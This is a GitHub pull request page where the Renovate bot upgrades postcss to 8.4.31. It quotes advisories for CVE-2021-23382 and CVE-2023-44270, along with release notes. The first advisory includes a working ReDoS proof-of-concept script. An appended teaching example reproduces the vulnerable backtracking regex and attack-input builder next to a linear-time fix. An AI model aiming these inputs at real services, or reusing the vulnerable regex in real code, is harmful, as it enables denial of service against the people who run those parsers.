Conversation

@renovate renovate bot commented Mar 11, 2025

This PR contains the following updates:

Package           Change
postcss (source)  8.4.24 -> 8.4.31

GitHub Vulnerability Alerts

CVE-2021-23382

The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern

\/\*\s* sourceMappingURL=(.*)

PoC

var postcss = require("postcss")

// Build a stylesheet that repeats the source-map annotation prefix n times
// and never closes the comment, so the annotation regex has to backtrack.
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Grow the input in steps of 1000 repetitions and time each parse;
// on vulnerable versions the cost grows super-linearly with length.
for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        try {
            postcss.parse(attack_str)
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}

CVE-2023-44270

An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.

This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contain parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.


Release Notes

postcss/postcss (postcss)

v8.4.31

Compare Source

v8.4.30

Compare Source

  • Improved source map performance (by Romain Menke).

v8.4.29

Compare Source

  • Fixed Node#source.offset (by Ido Rosenthal).
  • Fixed docs (by Christian Oliff).

v8.4.28

Compare Source

  • Fixed Root.source.end for better source map (by Romain Menke).
  • Fixed Result.root types when process() has no parser.

v8.4.27

Compare Source

  • Fixed Container clone methods types.

v8.4.26

Compare Source

  • Fixed clone methods types.

v8.4.25

Compare Source


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.
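The following is an added, self-contained example and is not code from this PR or from PostCSS itself. It illustrates the CVE-2021-23382 entry above: a backtracking regex of the same shape as the one the advisory describes in getAnnotationURL() / loadAnnotation() (greedy `.*` followed by a closing `*/` that the attacker omits) beside a bounded scan that extracts the same annotation without backtracking. The function names (extractWithRegex, extractLinear, buildAttack, timeExtract), the "last annotation wins" rule and the sample inputs are choices made for this example, not taken from the page or from the PostCSS source.

```javascript
// Added example, not PostCSS's own code. Contrasts a backtracking
// annotation regex with a bounded scan for the same `/*# sourceMappingURL=`
// comment. Function names and inputs are illustrative (assumptions).

// Shape of the vulnerable pattern: a greedy `.*` followed by a closing
// literal the attacker simply leaves out. The engine then retries from
// every `/*# sourceMappingURL=` prefix and backtracks `.*` across the rest
// of the input on each retry, so total cost grows quadratically.
const VULNERABLE_RE = /\/\*\s*# sourceMappingURL=(.*)\s*\*\//;

function extractWithRegex(css) {
  const m = css.match(VULNERABLE_RE);
  return m ? m[1].trim() : null;
}

// The prefix alone has no ambiguous repetition: `\s*` must be followed by
// `#`, so a failed attempt backtracks over at most one run of whitespace.
const PREFIX_RE = /\/\*\s*# sourceMappingURL=/g;

function extractLinear(css) {
  // Take the last prefix (assumption for this example: the annotation
  // conventionally sits at the end of the file), then find the next `*/`
  // with indexOf. Both steps are linear in the input length.
  let last = null;
  for (const m of css.matchAll(PREFIX_RE)) last = m;
  if (!last) return null;
  const urlStart = last.index + last[0].length;
  const end = css.indexOf('*/', urlStart);
  if (end === -1) return null; // unterminated comment: no usable annotation
  return css.slice(urlStart, end).trim();
}

// Constructed input mirroring the advisory's PoC: n annotation prefixes
// and no closing `*/` anywhere in the string.
function buildAttack(n) {
  return 'a{}' + '/*# sourceMappingURL='.repeat(n) + '!';
}

// Time one extraction; returns both the extracted value and elapsed ms.
function timeExtract(fn, css) {
  const t0 = process.hrtime.bigint();
  const result = fn(css);
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  return { result, ms };
}

if (typeof require !== 'undefined' && require.main === module) {
  const benign = 'a{}/*# sourceMappingURL=a.css.map */';
  console.log('benign:', extractWithRegex(benign), extractLinear(benign));
  for (const n of [500, 1000, 2000]) {
    const attack = buildAttack(n);
    const slow = timeExtract(extractWithRegex, attack);
    const fast = timeExtract(extractLinear, attack);
    console.log(`n=${n} length=${attack.length}` +
      ` regex=${slow.ms.toFixed(1)} ms linear=${fast.ms.toFixed(1)} ms`);
  }
}
```

Doubling n should roughly quadruple the regex timing while the linear scan stays flat; that is the signature to look for when triaging a ReDoS report against any "find a marker comment" regex, not only this one. Note that the two functions deliberately differ on inputs with several annotations: the regex variant grabs from the first prefix to the last `*/`, the scan variant keeps only the last annotation.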

@renovate renovate bot added the topic: automation Related to Circle CI, Peril, Renovate, scripts/*, Github Workflows, Github Actions, or Slackbot label Mar 11, 2025
@gatsbot gatsbot bot added the status: triage needed Issue or pull request that need to be triaged and assigned to a reviewer label Mar 11, 2025
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch from 51df8bd to f65ad01 Compare March 17, 2025 13:43
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 5 times, most recently from bb0df2a to 4e0aad5 Compare April 2, 2025 12:59
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 5 times, most recently from 22e6175 to b387533 Compare April 9, 2025 06:15
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 2 times, most recently from be03c3c to 95c641e Compare April 30, 2025 19:52
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 2 times, most recently from 5017b0d to f3d6391 Compare June 6, 2025 14:25
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 2 times, most recently from 859df4b to 8637fb1 Compare June 20, 2025 15:59
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 2 times, most recently from 6fcfb9d to d3d53b8 Compare June 25, 2025 18:51
@serhalp serhalp enabled auto-merge (squash) June 25, 2025 18:51
serhalp previously approved these changes Jun 25, 2025
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch from d3d53b8 to fef3d20 Compare June 25, 2025 19:02
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 3 times, most recently from cffe32b to 803d624 Compare August 6, 2025 07:34
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 2 times, most recently from c421844 to 450652c Compare August 6, 2025 19:01
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 6 times, most recently from 4161412 to 818ee34 Compare August 13, 2025 21:26
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch from 818ee34 to a17d8f3 Compare August 19, 2025 14:11
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch from a17d8f3 to 3f21e22 Compare August 31, 2025 11:10
@renovate renovate bot changed the title fix(deps): update dependency postcss to v8.4.31 [security] chore(deps): update dependency postcss to v8.4.31 [security] Sep 25, 2025